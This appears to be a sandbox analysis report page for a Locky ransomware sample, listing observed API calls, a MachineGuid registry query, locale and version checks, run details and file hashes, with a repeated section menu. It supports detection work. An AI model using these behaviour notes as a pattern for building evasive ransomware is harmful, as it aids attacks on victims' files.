Source: C:\Users\user\Desktop\LockyRansom.exe	Code function: 0_2_00405F08 SetUnhandledExceptionFilter,	0_2_00405F08

Source: C:\Users\user\Desktop\LockyRansom.exe

Code function: 0_2_0041973D SetSecurityDescriptorDacl,

0_2_0041973D

Source: C:\Users\user\Desktop\LockyRansom.exe

Code function: 0_2_004197BD AllocateAndInitializeSid,

0_2_004197BD

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\LockyRansom.exe

Code function: GetLocaleInfoA,GetUserDefaultUILanguage,

0_2_0042E700

Source: C:\Users\user\Desktop\LockyRansom.exe

Code function: 0_2_00406718 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_00406718

Source: C:\Users\user\Desktop\LockyRansom.exe

Code function: 0_2_00423053 GetVersionExA,

0_2_00423053

Source: C:\Users\user\Desktop\LockyRansom.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

ID:	1446225
Product:	CloudBasic
Start time:	01:12:08
Start date:	23.05.2024
Sample:	LockyRansom.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	1720b1748ad7b8ac0bfc1c3636fead95
SHA1:	97bae63417df5bde4a05cd44c6c523db50f6ab76
SHA256:	3329641a171508fa6b1ad7674b31431093d46be190d1a51acd77e486f42d9c8e
Filetype:	Win32 Executable (generic) a (10002005/4) 99.94%

Windows Analysis Report
LockyRansom.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

Windows Analysis Report LockyRansom.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

Windows Analysis Report
LockyRansom.exe